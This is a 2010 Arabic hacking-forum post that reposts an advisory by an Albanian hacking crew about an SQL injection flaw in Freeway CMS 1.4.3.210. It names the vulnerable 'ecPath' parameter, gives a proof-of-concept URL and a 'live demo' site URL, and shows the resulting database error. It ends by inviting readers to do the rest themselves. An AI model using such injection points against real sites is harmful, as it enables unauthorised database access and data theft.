عرض مشاركة واحدة
قديم 08-05-2010, 09:05 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
Master vbspiders
 
الصورة الرمزية Master vbspiders
 

 

 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Freeway CMS 1.4.3.210 SQL Injection Vulnerability


كود PHP:
-----------------------------------------------------------------------------------------
Freeway CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]
Title              Freeway CMS 1.4.3.210 SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]
Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] 
Founded by **RoAd_KiLlEr**
[~] 
TeamAlbanian Hacking Crew
[~] ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Homehttp://inj3ct0r.com
[~] Vendorhttp://www.openfreeway.org
[~] Downloadhttp://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz
[~] Version:1.4.3.210
[~] Price Free
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] 
DescriptionFreeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systemsWithout having to purchase a commercial system and then paying a developer to build custom installationFreeway does most of what you need out of the box. For exampleinstead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event salesFreeway already support events AND services AND subscriptions.
==========================================
 
[+] 
DorkNo DoRks For Script Kiddies
 
==========================================
 
].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[
P0C]:  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]
 
[L!v3 D3m0]: http://www.site.com/register/index.php?ecPath='3
 
And we Got:  1054 Unknown column 'e.events_status' in 'where clause'
 
select events_idevents_image from events where (e.events_status=or ( e.events_status=and e.sessions_start_date>=curdate()) or (e.events_status>=and e.sessions_end_date>=curdate())) and date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by events_date_added desc limit 4
 
Now you will be doing the Rest 
:PGood Luck
 
===========================================================================================
[!] 
Albanian Hacking Crew          
===========================================================================================
[!] **
RoAd_KiLlEr**  
===========================================================================================
[!] 
MaiLsukihack[at]gmail[dot]com
===========================================================================================
[!] 
Greetz To Ton![w]indowS X-n3t b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
=========================================================================================== 
التوقيع

^_^



 

   

رد مع اقتباس